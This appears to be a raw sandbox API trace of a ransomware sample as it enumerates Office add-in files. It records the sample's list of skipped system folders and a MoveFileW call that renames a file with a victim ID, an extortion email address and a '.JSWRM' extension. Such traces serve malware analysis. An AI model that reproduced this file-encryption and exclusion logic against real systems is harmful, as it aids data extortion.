[0125.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0125.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0125.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0125.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0125.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.804] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\bg\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\bg\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\bg\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\bg\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0125.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0125.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0125.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0125.805] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d76e38, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d76e38, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6d76e38, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0125.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0125.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0125.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0125.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0125.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e340 [0125.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.806] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd09866, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd09866, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x39040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0125.806] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0125.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0125.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d920, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0125.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0125.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0125.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ecb8 [0125.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0125.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.807] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6781ff8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6781ff8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15a90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0125.807] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0125.807] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0125.807] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0125.807] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0125.807] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0125.807] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0125.807] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0125.807] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.807] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0125.807] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0125.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0125.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d728, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0125.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0125.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0125.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d800, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0125.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0125.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0125.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0125.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.808] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9c75fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9c75fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa13ab7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20d030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0125.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0125.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0125.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dde8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0125.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0125.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0125.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0125.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d578, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0125.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0125.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244d20 [0125.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0125.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.808] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x863456d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2aa8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0125.808] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0125.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0125.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0125.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0125.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22ce70, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0125.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e110 [0125.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244d20 | out: hHeap=0x1e0000) returned 1 [0125.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.809] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf44563cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf44563cd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44c8b33, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x22aa8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0125.809] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0125.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0125.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0125.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dba8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0125.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0125.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0125.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0125.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dde8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0125.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0125.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ecb8 